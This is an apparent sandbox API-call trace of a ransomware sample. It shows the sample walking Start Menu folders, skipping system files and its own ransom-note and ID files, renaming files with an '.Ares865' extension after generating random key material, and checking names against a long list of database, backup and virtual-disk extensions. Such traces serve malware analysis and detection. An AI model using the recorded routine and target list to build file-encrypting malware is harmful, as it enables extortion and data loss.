[0066.919] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.920] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xef0, lpName=0x0) returned 0x120 [0066.921] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xef0) returned 0x420000 [0066.922] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.922] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.923] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0066.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0066.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.923] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0066.923] CloseHandle (hObject=0x120) returned 1 [0066.923] CloseHandle (hObject=0x12c) returned 1 [0066.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0066.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.924] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7805e570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7805e570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7805e570, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft InfoPath Filler 2010.lnk", cAlternateFileName="MICROS~4.LNK")) returned 1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="aoldtz.exe") returned 1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2=".") returned 1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="..") returned 1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="windows") returned -1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="bootmgr") returned 1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="temp") returned -1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="pagefile.sys") returned -1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="boot") returned 1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="ids.txt") returned 1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="ntuser.dat") returned -1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="perflogs") returned -1 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2="MSBuild") returned -1 [0066.924] lstrlenW (lpString="Microsoft InfoPath Filler 2010.lnk") returned 34 [0066.924] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk") returned 92 [0066.924] lstrcpyW (in: lpString1=0x2cce470, lpString2="Microsoft InfoPath Filler 2010.lnk" | out: lpString1="Microsoft InfoPath Filler 2010.lnk") returned="Microsoft InfoPath Filler 2010.lnk" [0066.924] lstrlenW (lpString="Microsoft InfoPath Filler 2010.lnk") returned 34 [0066.924] lstrlenW (lpString="Ares865") returned 7 [0066.924] lstrcmpiW (lpString1="010.lnk", lpString2="Ares865") returned -1 [0066.924] lstrlenW (lpString=".dll") returned 4 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2=".dll") returned 1 [0066.924] lstrlenW (lpString=".lnk") returned 4 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2=".lnk") returned 1 [0066.924] lstrlenW (lpString=".ini") returned 4 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2=".ini") returned 1 [0066.924] lstrlenW (lpString=".sys") returned 4 [0066.924] lstrcmpiW (lpString1="Microsoft InfoPath Filler 2010.lnk", lpString2=".sys") returned 1 [0066.924] lstrlenW (lpString="Microsoft InfoPath Filler 2010.lnk") returned 34 [0066.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk.Ares865") returned 98 [0066.925] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.926] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.926] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3026) returned 1 [0066.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.926] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.927] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.927] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.927] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xee0, lpName=0x0) returned 0x120 [0066.928] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xee0) returned 0x420000 [0066.930] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.930] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.930] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0066.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0066.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.931] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0066.931] CloseHandle (hObject=0x120) returned 1 [0066.931] CloseHandle (hObject=0x12c) returned 1 [0066.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0066.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.932] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4bb7f760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb7f760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Office 2010 Tools", cAlternateFileName="MICROS~1")) returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="aoldtz.exe") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2=".") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="..") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="windows") returned -1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="bootmgr") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="temp") returned -1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="pagefile.sys") returned -1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="boot") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="ids.txt") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="ntuser.dat") returned -1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="perflogs") returned -1 [0066.932] lstrcmpiW (lpString1="Microsoft Office 2010 Tools", lpString2="MSBuild") returned -1 [0066.932] lstrlenW (lpString="Microsoft Office 2010 Tools") returned 27 [0066.932] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk") returned 90 [0066.932] lstrcpyW (in: lpString1=0x2cce470, lpString2="Microsoft Office 2010 Tools" | out: lpString1="Microsoft Office 2010 Tools") returned="Microsoft Office 2010 Tools" [0066.932] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2600 [0066.932] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa8) returned 0x2e2710 [0066.932] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2608 | out: ListHead=0x2e7710, ListEntry=0x2d2608) returned 0x2d25a8 [0066.932] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7805e570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x780846d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x780846d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xb3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft OneNote 2010.lnk", cAlternateFileName="MI807F~1.LNK")) returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="aoldtz.exe") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2=".") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="..") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="windows") returned -1 [0066.932] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="bootmgr") returned 1 [0066.932] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="temp") returned -1 [0066.933] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="pagefile.sys") returned -1 [0066.933] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="boot") returned 1 [0066.933] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="ids.txt") returned 1 [0066.933] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="ntuser.dat") returned -1 [0066.933] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="perflogs") returned -1 [0066.933] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2="MSBuild") returned -1 [0066.933] lstrlenW (lpString="Microsoft OneNote 2010.lnk") returned 26 [0066.933] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned 83 [0066.933] lstrcpyW (in: lpString1=0x2cce470, lpString2="Microsoft OneNote 2010.lnk" | out: lpString1="Microsoft OneNote 2010.lnk") returned="Microsoft OneNote 2010.lnk" [0066.933] lstrlenW (lpString="Microsoft OneNote 2010.lnk") returned 26 [0066.933] lstrlenW (lpString="Ares865") returned 7 [0066.933] lstrcmpiW (lpString1="010.lnk", lpString2="Ares865") returned -1 [0066.933] lstrlenW (lpString=".dll") returned 4 [0066.933] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2=".dll") returned 1 [0066.933] lstrlenW (lpString=".lnk") returned 4 [0066.933] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2=".lnk") returned 1 [0066.933] lstrlenW (lpString=".ini") returned 4 [0066.933] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2=".ini") returned 1 [0066.933] lstrlenW (lpString=".sys") returned 4 [0066.933] lstrcmpiW (lpString1="Microsoft OneNote 2010.lnk", lpString2=".sys") returned 1 [0066.933] lstrlenW (lpString="Microsoft OneNote 2010.lnk") returned 26 [0066.933] lstrlenW (lpString="bak") returned 3 [0066.933] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0066.933] lstrlenW (lpString="ba_") returned 3 [0066.933] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0066.933] lstrlenW (lpString="dbb") returned 3 [0066.933] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0066.933] lstrlenW (lpString="vmdk") returned 4 [0066.933] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0066.933] lstrlenW (lpString="rar") returned 3 [0066.933] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0066.933] lstrlenW (lpString="zip") returned 3 [0066.933] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0066.933] lstrlenW (lpString="tgz") returned 3 [0066.933] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0066.933] lstrlenW (lpString="vbox") returned 4 [0066.933] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0066.934] lstrlenW (lpString="vdi") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0066.934] lstrlenW (lpString="vhd") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0066.934] lstrlenW (lpString="vhdx") returned 4 [0066.934] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0066.934] lstrlenW (lpString="avhd") returned 4 [0066.934] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0066.934] lstrlenW (lpString="db") returned 2 [0066.934] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0066.934] lstrlenW (lpString="db2") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0066.934] lstrlenW (lpString="db3") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0066.934] lstrlenW (lpString="dbf") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0066.934] lstrlenW (lpString="mdf") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0066.934] lstrlenW (lpString="mdb") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0066.934] lstrlenW (lpString="sql") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0066.934] lstrlenW (lpString="sqlite") returned 6 [0066.934] lstrcmpiW (lpString1="10.lnk", lpString2="sqlite") returned -1 [0066.934] lstrlenW (lpString="sqlite3") returned 7 [0066.934] lstrcmpiW (lpString1="010.lnk", lpString2="sqlite3") returned -1 [0066.934] lstrlenW (lpString="sqlitedb") returned 8 [0066.934] lstrcmpiW (lpString1="2010.lnk", lpString2="sqlitedb") returned -1 [0066.934] lstrlenW (lpString="xml") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0066.934] lstrlenW (lpString="$er") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0066.934] lstrlenW (lpString="4dd") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0066.934] lstrlenW (lpString="4dl") returned 3 [0066.934] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0066.934] lstrlenW (lpString="^^^") returned 3 [0066.935] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0066.935] lstrlenW (lpString="abs") returned 3 [0066.935] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0066.935] lstrlenW (lpString="abx") returned 3 [0066.935] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0066.935] lstrlenW (lpString="accdb") returned 5 [0066.935] lstrcmpiW (lpString1="0.lnk", lpString2="accdb") returned -1 [0066.935] lstrlenW (lpString="accdc") returned 5 [0066.935] lstrcmpiW (lpString1="0.lnk", lpString2="accdc") returned -1 [0066.935] lstrlenW (lpString="accde") returned 5 [0066.935] lstrcmpiW (lpString1="0.lnk", lpString2="accde") returned -1 [0066.935] lstrlenW (lpString="accdr") returned 5 [0066.935] lstrcmpiW (lpString1="0.lnk", lpString2="accdr") returned -1 [0066.935] lstrlenW (lpString="accdt") returned 5 [0066.935] lstrcmpiW (lpString1="0.lnk", lpString2="accdt") returned -1 [0066.935] lstrlenW (lpString="accdw") returned 5 [0066.935] lstrcmpiW (lpString1="0.lnk", lpString2="accdw") returned -1 [0066.935] lstrlenW (lpString="accft") returned 5 [0066.935] lstrcmpiW (lpString1="0.lnk", lpString2="accft") returned -1 [0066.935] lstrlenW (lpString="adb") returned 3 [0066.935] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0066.935] lstrlenW (lpString="adb") returned 3 [0066.935] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0066.935] lstrlenW (lpString="ade") returned 3 [0066.935] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0066.935] lstrlenW (lpString="adf") returned 3 [0066.935] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0066.936] lstrlenW (lpString="adn") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0066.936] lstrlenW (lpString="adp") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0066.936] lstrlenW (lpString="alf") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0066.936] lstrlenW (lpString="ask") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0066.936] lstrlenW (lpString="btr") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0066.936] lstrlenW (lpString="cat") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0066.936] lstrlenW (lpString="cdb") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0066.936] lstrlenW (lpString="ckp") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0066.936] lstrlenW (lpString="cma") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0066.936] lstrlenW (lpString="cpd") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0066.936] lstrlenW (lpString="dacpac") returned 6 [0066.936] lstrcmpiW (lpString1="10.lnk", lpString2="dacpac") returned -1 [0066.936] lstrlenW (lpString="dad") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0066.936] lstrlenW (lpString="dadiagrams") returned 10 [0066.936] lstrcmpiW (lpString1="e 2010.lnk", lpString2="dadiagrams") returned 1 [0066.936] lstrlenW (lpString="daschema") returned 8 [0066.936] lstrcmpiW (lpString1="2010.lnk", lpString2="daschema") returned -1 [0066.936] lstrlenW (lpString="db-journal") returned 10 [0066.936] lstrcmpiW (lpString1="e 2010.lnk", lpString2="db-journal") returned 1 [0066.936] lstrlenW (lpString="db-shm") returned 6 [0066.936] lstrcmpiW (lpString1="10.lnk", lpString2="db-shm") returned -1 [0066.936] lstrlenW (lpString="db-wal") returned 6 [0066.936] lstrcmpiW (lpString1="10.lnk", lpString2="db-wal") returned -1 [0066.936] lstrlenW (lpString="dbc") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0066.936] lstrlenW (lpString="dbs") returned 3 [0066.936] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0066.937] lstrlenW (lpString="dbt") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0066.937] lstrlenW (lpString="dbv") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0066.937] lstrlenW (lpString="dbx") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0066.937] lstrlenW (lpString="dcb") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0066.937] lstrlenW (lpString="dct") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0066.937] lstrlenW (lpString="dcx") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0066.937] lstrlenW (lpString="ddl") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0066.937] lstrlenW (lpString="dlis") returned 4 [0066.937] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0066.937] lstrlenW (lpString="dp1") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0066.937] lstrlenW (lpString="dqy") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0066.937] lstrlenW (lpString="dsk") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0066.937] lstrlenW (lpString="dsn") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0066.937] lstrlenW (lpString="dtsx") returned 4 [0066.937] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0066.937] lstrlenW (lpString="dxl") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0066.937] lstrlenW (lpString="eco") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0066.937] lstrlenW (lpString="ecx") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0066.937] lstrlenW (lpString="edb") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0066.937] lstrlenW (lpString="epim") returned 4 [0066.937] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0066.937] lstrlenW (lpString="fcd") returned 3 [0066.937] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0066.938] lstrlenW (lpString="fdb") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0066.938] lstrlenW (lpString="fic") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0066.938] lstrlenW (lpString="flexolibrary") returned 12 [0066.938] lstrcmpiW (lpString1="ote 2010.lnk", lpString2="flexolibrary") returned 1 [0066.938] lstrlenW (lpString="fm5") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0066.938] lstrlenW (lpString="fmp") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0066.938] lstrlenW (lpString="fmp12") returned 5 [0066.938] lstrcmpiW (lpString1="0.lnk", lpString2="fmp12") returned -1 [0066.938] lstrlenW (lpString="fmpsl") returned 5 [0066.938] lstrcmpiW (lpString1="0.lnk", lpString2="fmpsl") returned -1 [0066.938] lstrlenW (lpString="fol") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0066.938] lstrlenW (lpString="fp3") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0066.938] lstrlenW (lpString="fp4") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0066.938] lstrlenW (lpString="fp5") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0066.938] lstrlenW (lpString="fp7") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0066.938] lstrlenW (lpString="fpt") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0066.938] lstrlenW (lpString="frm") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0066.938] lstrlenW (lpString="gdb") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0066.938] lstrlenW (lpString="gdb") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0066.938] lstrlenW (lpString="grdb") returned 4 [0066.938] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0066.938] lstrlenW (lpString="gwi") returned 3 [0066.938] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0066.938] lstrlenW (lpString="hdb") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0066.939] lstrlenW (lpString="his") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0066.939] lstrlenW (lpString="ib") returned 2 